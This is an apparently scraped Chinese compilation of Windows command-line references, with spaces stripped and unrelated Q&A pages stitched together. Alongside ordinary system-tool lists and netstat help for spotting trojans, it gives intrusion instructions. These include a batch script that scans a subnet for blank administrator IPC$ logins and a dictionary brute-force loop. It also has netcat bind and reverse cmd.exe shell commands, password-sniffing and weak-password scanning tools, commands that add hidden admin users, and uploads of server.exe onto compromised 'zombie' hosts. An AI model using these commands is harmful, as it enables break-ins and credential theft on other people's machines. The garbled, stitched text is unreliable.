参数:/L指用增量形式{(set)为增量形式时};/F指从文件中不断取值,直到取完为止{(set)为文件时,如(d:pass.txt)时}。用法倮?@echooffecho用法格式:test.bat*.*.*>test.txtfor/L%%Gin(11254)doecho%1.%%G>>test.txt&netuse\%1.%%G/user:administrator|find"命令成功完成">>test.txt存为test.bat说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的%1;%%G为变量(ip的最后一位);&用来隔开echo和netuse这二个命令;|指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G为完整的IP地址;(11254)指起始值,增长量,结止值。@echooffecho用法格式:ok.batipFOR/F%%iIN(D:user.dic)DOsmb.exe%1%%iD:pass.dic200存为:ok.exe说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。(七)2:if命令及变量基本格式:IF[not]errorlevel数字命令语句如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。例:IFerrorlevel0命令指程序执行后返回的值为0时,就值行后面的命令;IFnoterrorlevel1命令指程序执行最后返回的值不等于1,就执行后面的命令。0指发现并成功执行(真);1指没有发现、没执行(假)。IF[not]字符串1==字符串2命令语句如果指定的文本字符串匹配(即:字符串1等于字符串2),就执行后面的命令。例:“if"%2%"=="4"gotostart”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加"")IF[not]exist文件名命令语句如果指定的文件名存在,就执行后面的命令。例:“ifnotnc.exegotoend”指:如果没有发现nc.exe文件就跳到":end"标签处。IF[not]errorlevel数字命令语句else命令语句或IF[not]字符串1==字符串2命令语句else命令语句或IF[not]exist文件名命令语句else命令语句加上:else命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else必须与if在同一行才有效。当有del命令时需把del命令全部内容用<>括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“ifexisttest.txt.elseechotest.txt.missing”,注意命令中的“.”(二)系统外部命令(均需下载相关工具):1、瑞士军刀:nc.exe参数说明:-h查看帮助信息-d后台模式-eprog程序重定向,一但连接就执行〔危险〕-isecs延时的间隔-l监听模式,用于入站连接-L监听模式,连接天闭后仍然继续监听,直到CTR+C-nIP地址,不能用域名-ofilm记录16进制的传输-p[空格]端口本地端口号-r随机本地及远程端口-t使用Telnet交互方式-uUDP模式-v详细输出,用-vv将更详细-w数字timeout延时间隔-z将输入,输出关掉(用于扫锚时)基本用法:nc-nvv192.168.0.180连接到192.168.0.1主机的80端口nc-l-p80开启本机的TCP80端口并监听nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口nc-l-p5354-t-ec:winntsystem32cmd.exe绑定remote主机的cmdshell在remote的TCP5354端口nc-t-ec:winntsystem32cmd.exe192.168.0.25354梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口高级用法:nc-L-p80作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止nc-L-p80>c:log.txt作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txtnc-L-p80存放文件的路径及名称传送文件到对方主机备注:|管道命令<或>重定向命令。“<”,例如:tlntadmn>d:log.txt意思是:后台执行dir,并把结果存在d:log.txt中>与>>的区别">"指:覆盖;">>"指:保存到(添加到)。如:@dirc:winnt>>d:log.txt和@dirc:winnt>d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。(八)2、扫锚工具:xscan.exe基本格式xscan-host<起始IP>[-<终止IP>]<检测项目>[其他选项]扫锚"起始IP到终止IP"段的所有主机信息xscan-file<主机列表文件名><检测项目>[其他选项]扫锚"主机IP列表文件名"中的所有主机信息检测项目-active检测主机是否存活-os检测远程操作系统类型(通过NETBIOS和SNMP协议)-port检测常用服务的端口状态-ftp检测FTP弱口令-pub检测FTP服务匿名用户写权限-pop3检测POP3-Server弱口令-smtp检测SMTP-Server漏洞-sql检测SQL-Server弱口令-smb检测NT-Server弱口令-iis检测IIS编码/解码漏洞-cgi检测CGI漏洞-nasl加载Nessus攻击脚本-all检测以上所有项目其它选项-i适配器编号设置网络适配器,<适配器编号>可通过"-l"参数获取-l显示所有网络适配器-v显示详细扫描进度-p跳过没有响应的主机-o跳过没有检测到开放端口的主机 -t并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量,默认数量为100,10-log文件名指定扫描报告文件名(后缀为:TXT或HTML格式的文件)用法示例xscan-host192.168.1.1-192.168.255.255-all-active-p检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机xscan-host192.168.1.1-192.168.255.255-port-smb-t150-o检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机xscan-filehostlist.txt-port-cgi-t200,5-v-o检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机(九)3、命令行方式嗅探器:xsniff.exe可捕获局域网内FTP/SMTP/POP3/HTTP协议密码参数说明-tcp输出TCP数据报-udp输出UDP数据报-icmp输出ICMP数据报-pass过滤密码信息-hide后台运行-host解析主机名-addrIP地址过滤IP地址-port端口过滤端口-log文件名将输出保存到文件-asc以ASCII形式输出-hex以16进制形式输出装机时常用的DOS命令浏览次数:6237次悬赏分:0|解决时间:2007-3-1113:59|提问者:々花无痕各位帮忙我才学装机但里面DOS命令太多了晕最佳答案winver检查Windows版本wmimgmt.msc打开Windows管理体系结构(wmi)wupdmgrWindows更新程序wscriptWindows脚本宿主设置write写字板winmsd系统信息 wiaacmgr扫描仪和照相机向导winchatxp自带局域网聊天mem.exe显示内存使用情况msconfig.exe系统配置实用程序mplayer2简易widnowsmediaplayermspaint画图板mstsc远程桌面连接mplayer2媒体播放机magnify放大镜实用程序mmc打开控制台mobsync同步命令dxdiag检查directx信息drwtsn32系统医生devmgmt.msc设备管理器dfrg.msc磁盘碎片整理程序diskmgmt.msc磁盘管理实用程序dcomcnfg打开系统组件服务ddeshare打开dde共享设置dvdplaydvd播放器netstopmessenger停止信使服务netstartmessenger开始信使服务notepad打开记事本nslookup网络管理的工具向导ntbackup系统备份和还原narrator屏幕“讲述人”ntmsmgr.msc移动存储管理器ntmsoprq.msc移动存储管理员操作请求netstat-an(tc)命令检查接口syncapp创建一个公文包sysedit系统配置编辑器sigverif文件签名验证程序sndrec32录音机shrpubw创建共享文件夹secpol.msc本地安全策略syskey系统加密,一旦加密就不能解开,保护Windowsxp系统的双重密码services.msc本地服务设置sndvol32音量控制程序sfc.exe系统文件检查器sfc/scannowwindows文件保护tsshutdn60秒倒计时关机命令tourstartxp简介(安装完成后出现的漫游xp程序)taskmgr任务管理器eventvwr事件查看器 eudcedit造字程序explorer打开资源管理器packager对象包装程序perfmon.msc计算机性能监测程序progman程序管理器regedit.exe注册表rsop.msc组策略结果集regedt32注册表编辑器rononce-p15秒关机regsvr32/u*.dll停止dll文件运行regsvr32/uzipfldr.dll取消zip支持cmd.execmd命令提示符chkdsk.exechkdsk磁盘检查certmgr.msc证书管理实用程序calc启动计算器charmap启动字符映射表cliconfgsqlserver客户端网络实用程序clipbrd剪贴板查看器conf启动netmeetingcompmgmt.msc计算机管理cleanmgr垃圾整理ciadv.msc索引服务程序osk打开屏幕键盘odbcad32odbc数据源管理器oobe/msoobe/a检查xp是否激活lusrmgr.msc本机用户和组logoff注销命令iexpress木马捆绑工具,系统自带nslookupip地址侦测器fsmgmt.msc共享文件夹管理器utilman辅助工具管理器gpedit.msc组策略运行输入CMD输入对应的相关实用程序:.打开C:\DocumentsandSettings\XXX(当前登录WindowsXP的用户名)..打开WindowsXP所在的盘符下的DocumentsandSettings文件夹...打开“我的电脑”选项。accwiz.exe辅助工具向导actmovie.exe直接显示安装工具append.exe允许程序打开制定目录中的数据arp.exe显示和更改计算机的IP与硬件物理地址的对应列表at.exe计划运行任务atmadm.exeATM调用管理器统计 attrib.exe显示和更改文件和文件夹属性autochk.exe检测修复文件系统(XP不可用)autoconv.exe在启动过程中自动转化系统(XP不可用)autofmt.exe在启动过程中格式化进程(XP不可用)autolfn.exe使用长文件名格式(XP不可用)arp.exe显示和更改计算机的IP与硬件物理地址的对应calc.exe计算器Bootvrfy.exe通报启动成功cacls.exe显示和编辑ACLcdplayer.exeCD播放器change.exe与终端服务器相关的查询(XP不可用)charmap.exe字符映射表chglogon.exe启动或停用会话记录(XP不可用)chgport.exe改变端口(终端服务)(XP不可用)chgusr.exe改变用户(终端服务)(XP不可用)chkdsk.exe磁盘检测程序chkntfs.exeNTFS磁盘检测程序cidaemon.exe组成Ci文档服务cipher.exe在NTFS上显示或改变加密的文件或目录cisvc.exe打开索引内容ckcnv.exe变换Cookiecleanmgr.exe磁盘清理cliconfg.exeSQL客户网络工具clipbrd.exe剪贴簿查看器clipsrv.exe运行Clipboard服务clspack.exe建立系统文件列表清单cluster.exe显示域的集群(XP不可用)cmd.exe进2000XPDOScmdl32.exe自动下载连接管理cmmgr32.exe连接管理器cmmon32.exe连接管理器监视cmstp.exe连接管理器配置文件安装程序comclust.exe集群comp.exe比较两个文件和文件集的内容conf启动netmeeting聊天工具controluserpasswords2XP密码管理.compmgmt.msc计算机管理cprofile.exe转换显示模式(XP不可用)开始,运行,输入CMD输入netconfigworkstation计算机名完整的计算机名用户名工作站处于活动状态(即网络描述)软件版本(即软件版本号)工作站域工作站域的DNS名称 登录域COM打开时间超时(秒)COM发送量(字节)COM发送超时(msec)CMD输入netconfigworkstation更改可配置工作站服务设置。CMD输入netconfigserver可以显示不能配置的下服务器计算机名服务器注释服务器版本(即软件版本号)服务器处于活动状态(即网络描述)服务器处于隐藏状态(即/hidden设置)最大登录用户数(即可使用服务器共享资源的最大用户数)每个会话打开文件的最大数(即用户可在一个会话中打开服务器文件的最大数)空闲会话时间(最小值)chkdsk.exe磁盘检查.Chkdsk/r2000命令控制台中的Chkdsk/r命令检查修复系统文件cleanmgr垃圾整理Clipbrd剪贴板查看器C:boot.ini打开启动菜单compact.exe显示或改变NTFS分区上文件的压缩状态conime.exeIME控制台control.exe控制面板convert.exeNTFS转换文件系统到NTFSconvlog.exe转换IIS日志文件格式到NCSA格式cprofile.exe转换显示模式cscript.exe较本宿主版本csrss.exe客户服务器Runtime进程(XP不可用)csvde.exe格式转换程序(XP不可用)dcpromo活动目录安装(XP不可用)drwtsn32系统医生diskmgmt.msc磁盘管理器(和PowerQuestPartitionMagic8.0)dvdplayDVD播放器devmgmt.msc设备管理器(检查电脑硬件,驱动)dxdiag检查DirectX信息dcomcnfg.exeDCOM配置属性(控制台根目录)dcpromo.exe安装向导(XP不可用)ddeshare.exeDDE共享debug.exe检查DEBUGdfrgfat.exeFAT分区磁盘碎片整理程序dfrgntfs.exeNTFS分区磁盘碎片整理程序(XP不可用)dfs_cmd_.exe配置DFS树(XP不可用)dfsinit.exe分布式文件系统初始化(XP不可用)dfssvc.exe分布式文件系统服务器(XP不可用)diantz.exe制作CAB文件diskperf.exe磁盘性能计数器dmremote.exe磁盘管理服务的一部分(XP不可用)doskey.exe命令行创建宏dosx.exeDOS扩展 dplaysvr.exe直接运行帮助(XP不可用)drwatson.exe华生医生错误检测drwtsn32.exe华生医生显示和配置管理dvdplay.exeDVD播放dxdiag.exeDirect-X诊断工具edlin.exe命令行的文本编辑esentutl.exeMS数据库工具eudcedit.exe造字程序eventvwr.exe事件查看器exe2bin.exe转换EXE文件到二进制expand.exe解压缩extrac32.exe解CAB工具fsmgmt.msc共享文件夹fastopen.exe快速访问在内存中的硬盘文件faxcover.exe传真封面编辑faxqueue.exe显示传真队列faxsend.exe发送传真向导faxsvc.exe启动传真服务fc.exe比较两个文件的不同find.exe查找文件中的文本行findstr.exe查找文件中的行finger.exe一个用户并显示出统计结果fixmapi.exe修复MAPI文件flattemp.exe允许或者禁用临时文件目录(XP不可用)fontview.exe显示字体文件中的字体forcedos.exe强制文件在DOS模式下运行ftp.exeFTP下载gpedit.msc组策略gdi.exe图形界面驱动grpconv.exe转换程序管理员组hostname.exe显示机器的HostnameInternat输入法图标iexpress木马捆绑工具,系统自带ieshwiz.exe自定义文件夹向导iexpress.exeiexpress安装包iisreset.exe重启IIS服务(未安装IIS,不可用)internat.exe键盘语言指示器(XP不可用)ipconfig.exe查看IP配置ipsecmon.exeIP安全监视器ipxroute.exeIPX路由和源路由控制程序irftp.exe无线连接ismserv.exe安装或者删除ServiceControlManager中的服务 jdbgmgr.exeJava4的调试器jetconv.exe转换JetEngine数据库(XP不可用)jetpack.exe压缩Jet数据库(XP不可用)jview.exeJava的命令行装载者label.exe改变驱动器的卷标lcwiz.exe许可证向导(XP不可用)ldifde.exeLDIF目录交换命令行管理(XP不可用)licmgr.exe终端服务许可协议管理(XP不可用)lights.exe显示连接状况(XP不可用)llsmgr.exeWindows2000许可协议管理(XP不可用)llssrv.exe启动许可协议服务器(XP不可用)locator.exeRPCLocator远程定位lodctr.exe调用性能计数logoff.exe注销当前用户lpq.exe显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务lpr.exe用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。lsass.exe运行LSA和Server的DLLlserver.exe指定默认Server新的DNS域(XP不可用)lusrmgr.msc本地账户管理mmc控制台mplayer2播放器macfile.exe管理MACFILES(XP不可用)magnify.exe放大镜makecab.exe制作CAB文件mem.exe显示内存状态migpwd.exe迁移密码mmc.exe控制台mnmsrvc.exe远程桌面共享mobsync.exe同步目录管理器mountvol.exe创建、删除或列出卷的装入点。mplay32.exeMediaPlayer媒体播放器mpnotify.exe通知应用程序mqbkup.exe信息队列备份和恢复工具mqmig.exeMSMQMigrationUtility信息队列迁移工具mrinfo.exe使用SNMP多点传送路由mscdexnt.exe安装MSCDmsdtc.exe动态事务处理控制台msg.exe发送消息到本地或远程客户mshta.exeHTML应用程序主机msiexec.exe开始Windows安装程序 mspaint.exe打开画图板mstask.exe任务计划表程序mstinit.exe任务计划表安装Msconfig.exe系统配置实用程序(配置启动选项,服务项)mem.exe显示内存使用情况mspaint画图板NetStopMessenger停止信使服务NetStartMessenger恢复信使服务nslookup网络管理的工具NslookupIP地址侦测器ntbackup系统备份和还原nbtstat.exe使用NBT(TCP/IP上的NetBIOS)显示协议统计和当前TCP/IP连接。nddeapir.exeNDDEAPI服务器端netsh.exe用于配置和监控Windows2000命令行脚本接口(XP不可用)netstat.exe显示协议统计和当前的TCP/IP网络连接。nlsfunc.exe加载特定国家的信息。Windows2000和MS-DOS子系统不使用该命令接受该命令只是为了与MS-DOS文件兼容。notepad.exe打开记事本nslookup.exe该诊断工具显示来自域名系统(DNS)名称服务器的信息。ntbackup.exe备份和故障修复工具ntfrs.exeNT文件复制服务(XP不可用)ntvdm.exe模拟16位Windows环境nw16.exeNetWare转向器nwscript.exe运行Netware脚本odbcad32.exe32位ODBC数据源管理(驱动程序管理)odbcconf.exe命令行配置ODBC驱动和数据源packager.exe对象包装程序pathping.exe包含Ping和Tracert的程序pentnt.exe检查Pentium的浮点错误perfmon.exe系统性能监视器ping.exe验证与远程计算机的连接posix.exe用于兼容Unixprint.exe打印文本文件或显示打印队列的内容。progman.exe程序管理器psxss.exePosix子系统应用程序qappsrv.exe在网络上显示终端服务器可用的程序qprocess.exe在本地或远程显示进程的信息(需终端服务)query.exe查询进程和对话(XP不可用)quser.exe显示用户登陆的信息(需终端服务)qwinsta.exe显示终端服务的信息rononce-p15秒关机 rasAdmin远程访问服务.regedit.exe注册表编辑器rasadmin.exe启动远程访问服务(XP不可用)rasautou.exe建立一个RAS连接rasdial.exe宽带,拨号连接ras.exe运行RAS连接(XP不可用)rcp.exe计算机和运行远程外壳端口监控程序rshd的系统之间复制文件rdpclip.exe终端和本地复制和粘贴文件recover.exe从坏的或有缺陷的磁盘中恢复可读取的信息。redir.exe运行重定向服务regedt32.exe32位注册服务regini.exe用脚本修改注册许可regwiz.exe注册向导replace.exe用源目录中的同名文件替换目标目录中的文件。rexec.exerexec命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP协议后才可以使用该命令。risetup.exe运行远程安装向导服务(XP不可用)route.exe控制网络路由表rsh.exe在运行RSH服务的远程计算机上运行命令rsnotify.exe远程存储通知回显runas.exe允许用户用其他权限运行指定的工具和程序rundll32.exe启动32位DLL程序rwinsta.exe重置会话子系统硬件和软件到最初的值Sndvol32音量控制程序sfc.exe或CMDsfc.exe回车系统文件检查器services.msc网络连接服务syskey系统加密,(一旦加密就不能解开,保护windowsxp系统的双重密码wupdmgrWIDNOWSUPDATE)SCANREG/RESTORE命令恢复最近的注册表secedit.exe自动化安全性配置管理services.exe控制所有服务sethc.exe设置高对比setver.exe设置MS-DOS子系统向程序报告的MS-DOS版本号sfc.exe系统文件检查shadow.exe监控另外一台中端服务器会话shrpubw.exe建立和共享文件夹sigverif.exe文件签名验证smlogsvc.exe性能日志和警报(XP不可用)sndrec32.exe录音机sndvol32.exe显示声音控制信息snmp.exe简单网络管理协议(XP不可用)snmptrap.exeSNMP工具(XP不可用) srvmgr.exe服务器管理器(XP不可用)subst.exe将路径与驱动器盘符关联sysedit.exe系统配置编辑器syskey.exeNT账号数据库加密工具sysocmgr.exe>Windows安装程序systray.exe在低权限运行systraytaskmgr任务管理器tasklist/svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(200098不可用)tlist-S(CMD)了解每个SVCHOST进程到底提供了多少系统服务(taskman.exe任务管理器(XP不可用)taskmgr.exe任务管理器tcmsetup.exe电话服务客户安装tcpsvcs.exeTCP服务termsrv.exe终端服务tftp.exe将文件传输到正在运行TFTP服务的远程计算机或从正在运行TFTP服务的远程计算机传输文件themes.exe桌面主题(XP不可用)tlntadmn.exeAdministratorTelnet服务管理tlntsess.exe显示目前的Telnet会话tlntsvr.exe开始Telnet服务tracert.exe诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议(ICMP)回显数据包发送到目标,以决定到达目标采用的路由tsadmin.exeAdministrator终端服务管理器(XP不可用)tscon.exe粘贴用户会话到终端对话tsdiscon.exe断开终端服务的用户tskill.exe杀掉终端服务tsprof.exe用终端服务得出查询结果tsshutdn.exe关闭系统unlodctr.exe性能监视器的一部分upg351db.exe升级Jet数据库(XP不可用)ups.exeUPSserviceUPS服务user.exeWindows核心服务userinit.exe打开我的文档usrmgr.exe域用户管理器utilman.exe指定2000启动时自动打开那台机器vwipxspx.exe调用IPX/SPXVDMw32tm.exe时间服务器wextract.exe解压缩Windows文件winchat.exe打开Windows聊天工具winhlp32.exe运行帮助系统winmsd.exe查看系统信息 winver.exe显示Windows版本wizmgr.exeWindows管理向导(XP不可用)wjview.exeJava命令行调用Javawrite.exe打开写字板wscript.exe脚本工具wupdmgr.exeWindowsupdate运行Windowsupdate升级向导winver检查Windows版本Win98系统工具开始,运行,输入Msconfig系统配置实用工具配置启动选项,包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。开始,运行,输入Regedit注册表修改工具注册表编辑器,如果没有把握不要随意修改注册表!开始,运行,输入Regsvr32dll注册工具当提示找不到dll文件时,可用此来注册该动态连接库。开始,运行,输入Regwiz注册向导用于注册。校验系统文件,并可恢复系统文件。如果启动时出现类似*.vxd文件错误,可用此恢复该vxd文件。开始,运行,输入Scandskw磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。开始,运行,输入DxDiagDirectX诊断工具可用于检测DirectX运行是否正常。开始,运行,输入NETSCAPEESC:清除当前命令行;F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止;F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上;Ctrl+H:删除光标左边的一个字符;Ctrl+CCtrl+Break,强行中止命令执行;Ctrl+M:表示回车确认键;Alt+F7:清除所有曾经输入的命令历史记录;Alt+PrintScreen:截取屏幕上当前命令窗里的内容。病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用Windows2000提供的“命令控制台”中的Chkdsk/r命令检查修复系统文件即可DOS命令字典..收藏netuseipipc$""/user:""建立IPC空链接netuseipipc$"密码"/user:"用户名"建立IPC非空链接 netuseh:ipc$"密码"/user:"用户名"直接登陆后映射对方C:到本地为H:netuseh:ipc$登陆后映射对方C:到本地为H:netuseipipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroup***istrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime目标ip查看对方时间nettime目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netviewip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip"文本信息"向对方发信息 netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipcnetshareipc$/del删除ipcnetsharec$/del删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件#2二:del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符路径要移动的文件名存放移动文件的路径移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt>3st.txt对比二个文件并把不同之处输出到3st.txt文件中,">"和">>"是重定向命令atid号开启已注册的某个计划任务at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止atid号/delete停止某个已注册的计划任务at查看所有的计划任务atiptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusername@host查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径文件名1路径文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copyc:srv.exeip***$复制本地c:srv.exe到对方的***下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copyip***$svv.exec:或:copyip***$*.*复制对方***i.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:server.exe登陆后,上传本地c:server.exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量dos命令查看端口状态浏览次数:21609次悬赏分:0|解决时间:2010-5-2816:41|提问者:vivi985019如何用DOS命令显示所有的监听端口?我想知道在DOC窗口下键入什么命令可以查看本机的所有监听端口?听说听说用这方法可以确定电脑是否中了木马。最佳答案1.Windows本身自带的netstat命令Netstat显示协议统计和当前的TCP/IP网络连接。该命令只有在安装了TCP/IP协议后才可以使用。netstat[-a][-e][-n][-s][-pprotocol][-r][interval]参数-a-显示所有连接和侦听端口。服务器连接通常不显示。-e-显示以太网统计。该参数可以与-s选项结合使用。-n-以数字格式显示地址和端口号(而不是尝试查找名称)。-s-显示每个协议的统计。默认情况下,显示TCP、UDP、ICMP和IP的统计。-p选项可以用来指定默认的子集。-pprotocol-显示由protocol指定的协议的连接;protocol可以是tcp或udp。如果与-s选项一同使用显示每个协议的统计,protocol可以是tcp、udp、icmp或ip。-r-显示路由表的内容。interval重新显示所选的统计,在每次显示之间暂停interval秒。按CTRL+B停止重新显示统计。如果省略该参数,netstat将打印一次当前的配置信息。好了,看完这些帮助文件,我们应该明白netstat命令的使用方法了。现在就让我们现学现用,用这个命令看一下自己的机器开放的端口。进入到命令行下,使用netstat命令的a和n两个参数:C:>netstat-an ActiveConnectionsProtoLocalAddressForeignAddressStateTCP0.0.0.0:800.0.0.0:0LISTENINGTCP0.0.0.0:210.0.0.0:0LISTENINGTCP0.0.0.0:76260.0.0.0:0LISTENINGUDP0.0.0.0:4450.0.0.0:0UDP0.0.0.0:10460.0.0.0:0UDP0.0.0.0:10470.0.0.0:0解释一下,ActiveConnections是指当前本机活动连接,Proto是指连接使用的协议名称,LocalAddress是本地计算机的IP地址和连接正在使用的端口号,ForeignAddress是连接该端口的远程计算机的IP地址和端口号,State则是表明TCP连接的状态,你可以看到后面三行的监听端口是UDP协议的,所以没有State表示的状态。看!我的机器的7626端口已经开放,正在监听等待连接,像这样的情况极有可能是已经感染了冰河!急忙断开网络,用杀毒软件查杀病毒是正确的做法。2.工作在windows2000下的命令行工具fport使用windows2000的朋友要比使用windows9X的幸运一些,因为可以使用fport这个程序来显示本机开放端口与进程的对应关系。Fport是FoundStone出品的一个用来列出系统中所有打开的TCP/IP和UDP端口,以及它们对应应用程序的完整路径、PID标识、进程名称等信息的软件。在命令行下使用,请看例子:D:>fport.exeFPortv1.33-TCP/IPProcesstoPortMapperCopyright2000byFoundstone,Inc.http://www.foundstone.comPidProcessPortProtoPath 748tcpsvcs->7TCPC:WINNTSystem32tcpsvcs.exe748tcpsvcs->9TCPC:WINNTSystem32tcpsvcs.exe748tcpsvcs->19TCPC:WINNTSystem32tcpsvcs.exe416svchost->135TCPC:WINNTsystem32svchost.exe是不是一目了然了。这下,各个端口究竟是什么程序打开的就都在你眼皮底下了。如果发现有某个可疑程序打开了某个可疑端口,可千万不要大意哦,也许那就是一只狡猾的木马!最佳答案netstat显示协议统计信息和当前TCP/IP网络连接。NETSTAT[-a][-b][-e][-n][-o][-pproto][-r][-s][-v][interval]-a显示所有连接和监听端口。-b显示包含于创建每个连接或监听端口的可执行组件。在某些情况下已知可执行组件拥有多个独立组件,并且在这些情况下包含于创建连接或监听端口的组件序列被显示。这种情况下,可执行组件名在底部的[]中,顶部是其调用的组件,等等,直到TCP/IP部分。注意此选项可能需要很长时间,如果没有足够权限可能失败。-e显示以太网统计信息。此选项可以与-s选项组合使用。-n以数字形式显示地址和端口号。-o显示与每个连接相关的所属进程ID。-pproto显示proto指定的协议的连接;proto可以是下列协议之一:TCP、UDP、TCPv6或UDPv6。如果与-s选项一起使用以显示按协议统计信息,proto可以是下列协议之一:IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP或UDPv6。-r显示路由表。-s显示按协议统计信息。默认地,显示IP、IPv6、ICMP、ICMPv6、TCP、TCPv6、UDP和UDPv6的统计信息;-p选项用于指定默认情况的子集。 